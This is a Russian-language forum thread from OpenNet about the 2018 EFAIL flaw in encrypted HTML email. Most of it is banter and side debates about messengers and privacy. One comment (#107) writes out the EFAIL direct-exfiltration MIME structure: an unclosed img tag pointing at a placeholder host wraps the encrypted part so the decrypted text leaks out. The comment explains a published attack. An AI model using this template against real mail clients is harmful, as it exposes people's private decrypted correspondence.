А вот тут ты не прав. Я делал так, и продолжаю делать. Берёшь ссылку и выдаёшь её пользователю. Прилагаешь к ссылке краткое описание, но на уровне хомячка, чтобы он понял. Хомячок либо сглатывает и соглашается, либо краснеет от смущения и убегает, либо решает продолжить спор, но, поскольку возразить криптографу по сути он не может, то его возражения превращаются в упражнения в демагогии. А демагогию хомячка довольно просто размазать по стенке. Хомячки ведь не умеют не только в технологии, но и в аргументацию тоже. Они начинают оскорблять, кричать "а у них негров линчуют", нести ещё какой-то бред -- тут надо просто игнорировать оскорбления и прочие эмоции, и разбирать его аргументы, показывая ему, что она не стоит ни выеденного гроша, ни сломанного яйца.

Правда я не вижу зачем это можно делать, кроме как поглумиться над хомячком. Они, когда их к стенке припрёшь, начинают вертеться ужом на сковородке, скатываться всё глубже и глубже в оскорбления. С хомячком случается такое психологическое явление как регрессия: когда всякие "взрослые" методы работы с проблемой не работают, человек начинает использовать методы более ранних возрастов. А потом ещё более ранних. Моё наивысшее достижение -- я человека довёл до пятилетнего возраста, он начал твердить мне что-то типа "ты дурак", и что бы я ему не писал, он отвечал мне "ты дурак". Было прикольно, жалко что за такие достижения не дают памятных грамот и медалей. Я бы на стенку повесил.

Ответить | Правка | ^ к родителю #86 | Наверх | Cообщить модератору

109. "Критическая уязвимость в системах шифрования email на..."  +/
Сообщение от Аноним (??) on 14-Май-18, 21:19 
Ух ты, тут как раз в соседней ветке freehck завалился в такой режим! Из всех аргументов - вопли что я ламер. А это оказывается вот оно что! Ух спасибище за объясение эффекта.
Ответить | Правка | ^ к родителю #92 | Наверх | Cообщить модератору

114. "Критическая уязвимость в системах шифрования email на..."  +/
Сообщение от Anonimous on 14-Май-18, 21:42 
Моё наивысшее достижение -- я человека довёл
> до пятилетнего возраста, он начал твердить мне что-то типа "ты дурак",
> и что бы я ему не писал, он отвечал мне "ты
> дурак". Было прикольно, жалко что за такие достижения не дают памятных
> грамот и медалей. Я бы на стенку повесил.

Сдаётся мне, что тот человек в корень зрил, а до тебя так и не дошло.
Перечитай свой пост ещё раз, распечатай и повесь на стенку. Возможно однажды дойдет.

Ответить | Правка | ^ к родителю #92 | Наверх | Cообщить модератору

117. "Критическая уязвимость в системах шифрования email на..."  +/
Сообщение от Ordu email(ok) on 14-Май-18, 22:19 
>  Моё наивысшее достижение -- я человека довёл
>> до пятилетнего возраста, он начал твердить мне что-то типа "ты дурак",
>> и что бы я ему не писал, он отвечал мне "ты
>> дурак". Было прикольно, жалко что за такие достижения не дают памятных
>> грамот и медалей. Я бы на стенку повесил.
> Сдаётся мне, что тот человек в корень зрил, а до тебя так
> и не дошло.

Да какая мне разница, куда он там зрил, если он от увиденного зрелища регрессировал до уровня пятилетнего?

Ответить | Правка | ^ к родителю #114 | Наверх | Cообщить модератору

116. "Критическая уязвимость в системах шифрования email на..."  +/
Сообщение от arisu (ok) on 14-Май-18, 21:51 
это потому, что ты и есть дурак. такие дела.
Ответить | Правка | ^ к родителю #92 | Наверх | Cообщить модератору

118. "Критическая уязвимость в системах шифрования email на..."  +/
Сообщение от Ordu email(ok) on 14-Май-18, 22:22 
> это потому, что ты и есть дурак. такие дела.

И чё? Я и без хомячьих подсказок знаю, собственно, и не скрываю. Ну, не кричу на всех углах об этом, конечно, но и не скрываю.

Ответить | Правка | ^ к родителю #116 | Наверх | Cообщить модератору

120. "Критическая уязвимость в системах шифрования email на..."  +/
Сообщение от Анонним on 15-Май-18, 00:12 
все хомяки, а я мамкин психоаналитик! Регрессия, говорите?
Ответить | Правка | ^ к родителю #118 | Наверх | Cообщить модератору

121. "Критическая уязвимость в системах шифрования email на..."  +/
Сообщение от Ordu email(ok) on 15-Май-18, 00:44 
> все хомяки, а я мамкин психоаналитик! Регрессия, говорите?

Так это не я говорю -- это Фройд говорил. Ты можешь заглянуть в википедию и убедиться в этом. А то что хомяки -- так вы же сами по своей собственной инициативе стали подражать тому хомячку. Тут уж, как говорится, назвался груздем, полезай в кузов.

Ответить | Правка | ^ к родителю #120 | Наверх | Cообщить модератору

123. "Критическая уязвимость в системах шифрования email на..."  +/
Сообщение от Anonimous on 15-Май-18, 01:03 
> Так это не я говорю -- это Фройд говорил. Ты можешь заглянуть
> в википедию и убедиться в этом. А то что хомяки --
> так вы же сами по своей собственной инициативе стали подражать тому
> хомячку. Тут уж, как говорится, назвался груздем, полезай в кузов.

это ты ловко с темы спрыгнул! на этом, пожалуй, и закончим.

Ответить | Правка | ^ к родителю #121 | Наверх | Cообщить модератору

132. "Критическая уязвимость в системах шифрования email на..."  +/
Сообщение от Аноним (??) on 16-Май-18, 03:07 
> это потому, что ты и есть дурак. такие дела.

Парадокс в том что это пофиг. Если некто демонстрирует уровень имбецила на публику, его логично считать именно таким имбецилом. А ordu на настолько махрового имбецила все-же не похож, у него аргументы явно посильнее 5-летнего.

Ответить | Правка | ^ к родителю #116 | Наверх | Cообщить модератору

94. "Критическая уязвимость в системах шифрования email на основе..."  +1 +/
Сообщение от Ivan_83 (ok) on 14-Май-18, 19:31 
Нет промежуточной позиции.

Поскольку оно привязано к мобиле - того кого надо быстро триангулируют, если он вообще на себя не зарегал.
А заодно и звонки и смс подымут.
А по имеи ещё и узнают какие ещё симки/номера бывали в этой мобиле.

TLS был придумал чтобы пользоваться банковскими услугами онлайн, это априори подразумевает некоторую степень доверия всей этой системе и деанонимизацию.

Ответить | Правка | ^ к родителю #79 | Наверх | Cообщить модератору

96. "Критическая уязвимость в системах шифрования email на основе..."  –1 +/
Сообщение от Crazy Alex (ok) on 14-Май-18, 19:57 
Ну вот тебе и промежуточная позиция - для триангуляции и подобного надо заинтересовать власти, причём откуда-то ещё, чтобы они пошевелились и предприняли какие-то действия. Но никак не читать/анализировать переписку всех со всеми, как с тем же скайпом или вконтактом.

Насчёт TLS - именно, и мвои функции ин неплохо выполняет, заоднлюо рубя всяких горе-хакеров и на прочих сайтах

Ответить | Правка | ^ к родителю #94 | Наверх | Cообщить модератору

122. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Anonimous on 15-Май-18, 00:50 
"для триангуляции и подобного надо заинтересовать власти"

это работает до тех пор пока они (власти) не обладают не обладают технической возможностью постоянно хранить всю бигдату где-то у себя. Как только такая возможность в России появится - нейронные сетки будут день и ночь заинтересованно копать и сопоставлять информацию. После этого можно будет 90% страны прислать различные штрафы по почте, а остальных сразу посадить. Для справки, в штатах подобное хранилище уже есть, https://en.wikipedia.org/wiki/Utah_Data_Center .
Другое дело, что в штатах у каждого второго дома арсенал оружия, поэтому власти очень аккуратно себя ведут.

Ответить | Правка | ^ к родителю #96 | Наверх | Cообщить модератору

29. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Аноним (??) on 14-Май-18, 11:58 
> телеграм и сигнал пусть идут по дальше, такие проекты ущемляющие свободы пользователей
> и их приватность.

как будто днс, который использует емейлом, не является таковым. Только почтовые голуби с одноразовыми блокнотами спасут отца Русской Приватности.

Ответить | Правка | ^ к родителю #25 | Наверх | Cообщить модератору

37. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Andrey Mitrofanov on 14-Май-18, 12:38 
>днс, который использует емейлом, не

Deeper, bro!

https://gnunet.org/gns / https://duckduckgo.com/?q=gnunet+dns
/https://duckduckgo.com/?q=dht+dns /... //... ...

Ответить | Правка | ^ к родителю #29 | Наверх | Cообщить модератору

102. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Михрютка (ok) on 14-Май-18, 21:00 
шутки шутками, а whois 25 числа обещали прикрыть, бо gdpr compliance
Ответить | Правка | ^ к родителю #29 | Наверх | Cообщить модератору

30. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Аноним (??) on 14-Май-18, 12:02 
Ring, Tox
Ответить | Правка | ^ к родителю #25 | Наверх | Cообщить модератору

21. "Критическая уязвимость в системах шифрования email на основе..."  –3 +/
Сообщение от Аноним (??) on 14-Май-18, 11:53 
Телеграм.
Ответить | Правка | ^ к родителю #17 | Наверх | Cообщить модератору

43. "Критическая уязвимость в системах шифрования email на основе..."  +1 +/
Сообщение от Аноним (??) on 14-Май-18, 12:56 
Кто бы объяснил: на фига телеграм привязан к телефонному номеру?
Ответить | Правка | ^ к родителю #21 | Наверх | Cообщить модератору

49. "Критическая уязвимость в системах шифрования email на основе..."  –1 +/
Сообщение от Аноним (??) on 14-Май-18, 13:30 
чтобы монетизировать сервис
Ответить | Правка | ^ к родителю #43 | Наверх | Cообщить модератору

55. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Аноним (??) on 14-Май-18, 14:03 
> чтобы монетизировать сервис

Каким образом?


Ответить | Правка | ^ к родителю #49 | Наверх | Cообщить модератору

52. "Критическая уязвимость в системах шифрования email на основе..."  –1 +/
Сообщение от Аноним (??) on 14-Май-18, 13:50 
Кто бы объяснил: на фига опеннет привязан к почтовому ящику?
Ответить | Правка | ^ к родителю #43 | Наверх | Cообщить модератору

63. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Аноним (??) on 14-Май-18, 14:55 
"Гениальное" сравнение, молодец
Ответить | Правка | ^ к родителю #52 | Наверх | Cообщить модератору

64. "Критическая уязвимость в системах шифрования email на основе..."  –1 +/
Сообщение от Аноним (??) on 14-Май-18, 14:59 
Ты считаешь есть разница?
Ответить | Правка | ^ к родителю #63 | Наверх | Cообщить модератору

90. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Ordu email(ok) on 14-Май-18, 18:20 
Да. Я могу создать сколько угодно почтовых ящиков. И очень часто создаю под новые регистрации новые почтовые ящики. С номерами телефонов всё гораздо сложнее. Я пытался как-то найти сервис, который позволял бы зарегистрировать одноразовый номер для получения одной смс, и чёт у меня не вышло это.
Ответить | Правка | ^ к родителю #64 | Наверх | Cообщить модератору

133. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Аноним (??) on 16-Май-18, 03:11 
> Я пытался как-то найти сервис, который позволял бы зарегистрировать одноразовый
> номер для получения одной смс, и чёт у меня не вышло это.

Это ты плохо искал. Есть такие. Недорого и круто. У некоторых даже есть демо-номера, куда можно совсем уж нахаляву наспамить. Популярные сервисы там конечно выюзаны, но...

Ответить | Правка | ^ к родителю #90 | Наверх | Cообщить модератору

67. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Аноним (??) on 14-Май-18, 15:18 
Hacke Nnews вообще-то прекрасно обходится без почты
Ответить | Правка | ^ к родителю #63 | Наверх | Cообщить модератору

78. "Критическая уязвимость в системах шифрования email на..."  +/
Сообщение от arisu (ok) on 14-Май-18, 17:36 
> Hacke Nnews вообще-то прекрасно обходится без почты

а ты, конечно, чтобы написать этот комментарий, был просто вынужден ввести свой почтовый адрес.

Ответить | Правка | ^ к родителю #67 | Наверх | Cообщить модератору

88. "Критическая уязвимость в системах шифрования email на..."  +/
Сообщение от Аноним (??) on 14-Май-18, 18:14 
Мы тебе про регистрацию, а ты про комментарий.
Ответить | Правка | ^ к родителю #78 | Наверх | Cообщить модератору

106. "Критическая уязвимость в системах шифрования email на..."  +/
Сообщение от Михрютка (ok) on 14-Май-18, 21:09 
>> Hacke Nnews вообще-то прекрасно обходится без почты
> а ты, конечно, чтобы написать этот комментарий, был просто вынужден ввести свой
> почтовый адрес.

походу почтовый адрес моей учетки на опеннете не существует, как и домен. это мне не очень мешает.

Ответить | Правка | ^ к родителю #78 | Наверх | Cообщить модератору

115. "Критическая уязвимость в системах шифрования email на..."  +/
Сообщение от arisu (ok) on 14-Май-18, 21:44 
глупый анонимус не в курсе, что на опеннете email при регистрации нужен исключительно для того, чтобы туда присылали комментарии, и вводить можно любую несуществующую фигню. но зато он Мнение Имеет!
Ответить | Правка | ^ к родителю #106 | Наверх | Cообщить модератору

111. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Михрютка (ok) on 14-Май-18, 21:22 
> Кто бы объяснил: на фига телеграм привязан к телефонному номеру?

коллега, если вы приучите простого пользователя, испорченного смартфонами, заносить в телефонную книгу не номер телефона, а vasiapupkin@gde-to-tam, вы испытаете просветление и станете стивджобсом.

посчитайте, сколько у вас процентов в телефонной книге контактов, у которых не указан телефон, но указан какой-то другой идентификатор. обдумайте полученный результат.

я молчу о том, что signal, например, изначально был сделан для шифрования sms. тут без номера телефона вообще тяжело.

Ответить | Правка | ^ к родителю #43 | Наверх | Cообщить модератору

126. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Аноним (??) on 15-Май-18, 02:11 
Кому нравится - пусть при регистрации указывает телефонный номер, но зачем же это навязывать?
Ответить | Правка | ^ к родителю #111 | Наверх | Cообщить модератору

130. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Михрютка (ok) on 15-Май-18, 23:40 
на киевстар пожалуйся. они на каждой симке телефонный номер навязывают.
Ответить | Правка | ^ к родителю #126 | Наверх | Cообщить модератору

134. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Аноним (??) on 16-Май-18, 03:23 
> тут без номера телефона вообще тяжело.

Телефонный номер в смс - весьма абстрактная штука. Если так посмотреть что в нем написано в входящих смс - ну ты понял. Кто угодно может так же. Просто не все об этом задумываются.

Представляешь, любой желающий может на самом деле обложить с якобы твоего номера кого угодно трехэтажным матом, например. Несколько менее примитивные варианты провернутые на 1 апреля заставляют корчиться под столом немало гиков - все ограничено только фантазией, большинство хомяков думают как ты и ведутся на раз.

Ответить | Правка | ^ к родителю #111 | Наверх | Cообщить модератору

59. "Критическая уязвимость в системах шифрования email на основе..."  +1 +/
Сообщение от Ivan_83 (ok) on 14-Май-18, 14:28 
ггг как вам мозги то промыли.
Телега от аськи и мыло агента отличается только в худьшую сторону, ибо аська с агентом изначально мобилу не требовали и их можно было юзать не имея/не светя свой номер.
Ответить | Правка | ^ к родителю #21 | Наверх | Cообщить модератору

22. "Критическая уязвимость в системах шифрования email на основе..."  +1 +/
Сообщение от Вещества on 14-Май-18, 11:54 
жаббер с omemo
Ответить | Правка | ^ к родителю #17 | Наверх | Cообщить модератору

24. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Аноним (??) on 14-Май-18, 11:56 
DIME Ладара Левисона?
Ответить | Правка | ^ к родителю #17 | Наверх | Cообщить модератору

26. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от 1 (??) on 14-Май-18, 11:56 
хипстерский телеграмчик.

А по делу. Почта на бумаге - это 19 век (если не раньше) но всё как-то не избавиться.

Ответить | Правка | ^ к родителю #17 | Наверх | Cообщить модератору

19. "Критическая уязвимость в системах шифрования email на основе..."  –1 +/
Сообщение от Нанобот (ok) on 14-Май-18, 11:52 
>среди исследователей, которые входят в команду, выявившую уязвимость, в основном представлены эксперты, специализирующиеся на криптографических алгоритмах

не беда, сейчас эксперты опеннета разберут все остальные малоизученные области и выдадут своё экспертное заключение 😂

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

35. "Критическая уязвимость в системах шифрования email на основе..."  +1 +/
Сообщение от Andrey Mitrofanov on 14-Май-18, 12:32 
>>среди исследователей, которые входят в команду, выявившую уязвимость, в основном представлены эксперты, специализирующиеся на криптографических алгоритмах
> не беда, сейчас эксперты опеннета разберут все остальные малоизученные области и выдадут
> своё экспертное заключение 😂

Особенно глубока и хорошо проработана экспертиза заключений эксертов по экспертизе областей опенета в области экспертизы.  О да, коллега, безусловно!

Но надо идти глубже++   //https://duckduckgo.com/?q=need+to+go+deeper&t=ffnt&iax=image...

Ответить | Правка | ^ к родителю #19 | Наверх | Cообщить модератору

40. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Annoynymous (ok) on 14-Май-18, 12:49 
Мы нашли уязвимость, но мы вам её не покажем, не расскажем и вообще, о чём новость?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

44. "Критическая уязвимость в системах шифрования email на основе..."  +1 +/
Сообщение от Ordu email(ok) on 14-Май-18, 13:01 
О том, что у тебя есть время до завтра подумать и хоть как-то среагировать на грядущее раскрытие уязвимости.
Ответить | Правка | ^ к родителю #40 | Наверх | Cообщить модератору

53. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Andrey Mitrofanov on 14-Май-18, 13:52 
> О том, что у тебя есть время до завтра подумать и хоть
> как-то среагировать на грядущее раскрытие уязвимости.

Все писатели шифрованных HTML-писем соберут чемоданы, бросят квартиру(-ы), машины, дачи, яхты и... успеют улететь у Дурову во ...Вьетнам? ...Амстердам? ...Лондон или куда-там???

А нет ли тут ушей главного борца с коррупцией в э ^W одной стране!?

...или я слегка переоцениваю угрозы от нашей прокуратуры....

Ответить | Правка | ^ к родителю #44 | Наверх | Cообщить модератору

89. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Ordu email(ok) on 14-Май-18, 18:16 
> Все писатели шифрованных HTML-писем соберут чемоданы, бросят квартиру(-ы), машины, дачи, яхты и... успеют улететь у Дурову во ...Вьетнам? ...Амстердам? ...Лондон или куда-там???

Нет, там же написано, что судя по всему будет достаточно срочно сменить email-клиент на что-нибудь, что не умеет в html, отображая его текстом.

Ответить | Правка | ^ к родителю #53 | Наверх | Cообщить модератору

60. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Аноним (??) on 14-Май-18, 14:33 
Уже нету
https://efail.de/
Ответить | Правка | ^ к родителю #44 | Наверх | Cообщить модератору

61. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Andrey Mitrofanov on 14-Май-18, 14:37 
> Уже нету
> https://efail.de/

Ждём посадок.

Ответить | Правка | ^ к родителю #60 | Наверх | Cообщить модератору

68. "Критическая уязвимость в системах шифрования email на основе..."  –1 +/
Сообщение от Ураган on 14-Май-18, 15:24 
На бутыль?
Ответить | Правка | ^ к родителю #61 | Наверх | Cообщить модератору

41. "Критическая уязвимость в системах шифрования email на основе..."  –2 +/
Сообщение от Аноним (??) on 14-Май-18, 12:52 
А какое шифрование используется в почте safe-mail.net и tutanota?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

42. "Критическая уязвимость в системах шифрования email на основе..."  –1 +/
Сообщение от Аноним (??) on 14-Май-18, 12:54 
Никакое.
Ответить | Правка | ^ к родителю #41 | Наверх | Cообщить модератору

85. "Критическая уязвимость в системах шифрования email на основе..."  +1 +/
Сообщение от Darth Vader on 14-Май-18, 18:03 
Use Protonmail, Luke!
Ответить | Правка | ^ к родителю #41 | Наверх | Cообщить модератору

87. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Аноним (??) on 14-Май-18, 18:10 
Они хохлам всё сливали. Не вариант.
Ответить | Правка | ^ к родителю #85 | Наверх | Cообщить модератору

112. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Анонимус2333 on 14-Май-18, 21:27 
А где про это можно почитать? Ссылкой поделитесь, пожалуйста.
Ответить | Правка | ^ к родителю #87 | Наверх | Cообщить модератору

93. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Аноним (??) on 14-Май-18, 19:31 
тоже самое что и у протона, вроде - опенпгп на жс. Учитывая что закрытые ключи этих сервисов юзверю не доступны - я бы не считал их чем то сесурным
Ответить | Правка | ^ к родителю #41 | Наверх | Cообщить модератору

54. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Аноним (??) on 14-Май-18, 13:54 
> Судя по всему, проблема связана с тем, что HTML может использоваться как канал для подстановки в письма заранее известных меток (oracle), например, через манипуляции с тегом "img".

Интересно как это отразиться на каком-нибудь Mutt.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

69. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от alex53 (ok) on 14-Май-18, 16:37 
На mutt сам по себе - никак. Проблемы будут только если для написания писем будет использоваться html редактор.
Ответить | Правка | ^ к родителю #54 | Наверх | Cообщить модератору

119. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от КО on 14-Май-18, 23:21 
И даже в этом случае в нормальном клиенте не страшно - ибо его html по умолчанию он в инет не выходит.
Ответить | Правка | ^ к родителю #69 | Наверх | Cообщить модератору

56. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Аноним (??) on 14-Май-18, 14:07 
Пока вы тут комментите, уже подробности опубликовали:
https://efail.de/
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

71. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от annual slayer on 14-Май-18, 16:41 
с логотипом уже, кстати ;)
Ответить | Правка | ^ к родителю #56 | Наверх | Cообщить модератору

70. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Аноним email(??) on 14-Май-18, 16:38 
Ну дык дырявые клиенты, дырявый HTML, а не сами GPG и GPG4win. Ручками вставлять и проверять, ручками. Развели тут панику.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

77. "Критическая уязвимость в системах шифрования email на основе..."  –2 +/
Сообщение от Аноним (??) on 14-Май-18, 17:35 
Думаешь в самом GPG нет дыр? Верить в идеальность софта в 2018?
Ответить | Правка | ^ к родителю #70 | Наверх | Cообщить модератору

95. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Аноним (??) on 14-Май-18, 19:32 
>только писем, переданных в формате HTML

пересылать конфиденциальную инфу в хтмл - ссзб

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

97. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Аноним84701 (ok) on 14-Май-18, 20:23 
>>только писем, переданных в формате HTML
> пересылать конфиденциальную инфу в хтмл - ссзб

Не пересылать в HTML не поможет. Поможет не расшифровывать или же не рендерить (альтернативно: не допускать при этом никаких внешних запросов).
См. вполне доходчивый пример:
https://efail.de/ (Direct Exfiltration)

Кстати, как и ожидалось - Claws и Мutt  (ну и еще несколько менее удобных, второстепенных клиентов) уязвимости не подвержены :)

Ответить | Правка | ^ к родителю #95 | Наверх | Cообщить модератору

98. "Критическая уязвимость в системах шифрования email на..."  +/
Сообщение от arisu (ok) on 14-Май-18, 20:29 
поможет чудесный маленький фильтр, который html-мусор выкидывает. вместе со всем письмом.
Ответить | Правка | ^ к родителю #97 | Наверх | Cообщить модератору

100. "Критическая уязвимость в системах шифрования email на..."  +1 +/
Сообщение от Аноним (??) on 14-Май-18, 20:41 
> поможет чудесный маленький фильтр, который html-мусор выкидывает. вместе со всем письмом.

Интересно, а в случае HTML не прокатит внаглую скриптом читать содержимое хтмылки и скидывать его в ремотный канал? Так, глядя на это безобразие.

//в общем хорошо что я предпочитаю plain text и когтемыл...

Ответить | Правка | ^ к родителю #98 | Наверх | Cообщить модератору

101. "Критическая уязвимость в системах шифрования email на..."  +/
Сообщение от arisu (ok) on 14-Май-18, 20:55 
> Интересно, а в случае HTML не прокатит внаглую скриптом читать содержимое хтмылки
> и скидывать его в ремотный канал? Так, глядя на это безобразие.

зависит от криворукости авторов клиентов. в принципе, все нормальные клиенты должны запрещать такие шутки… но с другой стороны: нормальные люди не пишут клиентов с поддержкой html в письмах.

Ответить | Правка | ^ к родителю #100 | Наверх | Cообщить модератору

107. "Критическая уязвимость в системах шифрования email на..."  +/
Сообщение от Аноним84701 (ok) on 14-Май-18, 21:10 
> Интересно, а в случае HTML не прокатит внаглую скриптом читать содержимое хтмылки
> и скидывать его в ремотный канал? Так, глядя на это безобразие.

А смысл?
Принципиально расшифровка и leak делаются вот так:


Content-Type: text/html
<img src="https://foo.bar/
--BOUNDARY--
Content-Type: application/pksc7-mime:
Foo:bar
ENCRYPTED MSG // сюда можно подставить любое содержимое, т.е. из тех же текствоых писем
--BOUNDARY--
Content-Type: text/html
">
--BOUNDARY--

т.е. все достаточно  просто.  
А JS все же обычно по умолчанию режется/отключен (вроде бы thunderbird с версии 3, аутлук, гмейл), из-за спама и прочих "радостей".
Ответить | Правка | ^ к родителю #100 | Наверх | Cообщить модератору

99. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Аноним (??) on 14-Май-18, 20:37 
> проблема касается только писем, переданных в формате HTML,

А, ну это еще не так страшно.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема


  Закладки на сайте
  Проследить за страницей
Created 1996-2018 by Maxim Chirkov  
ДобавитьПоддержатьВебмастеруГИД  
Hosting by Ihor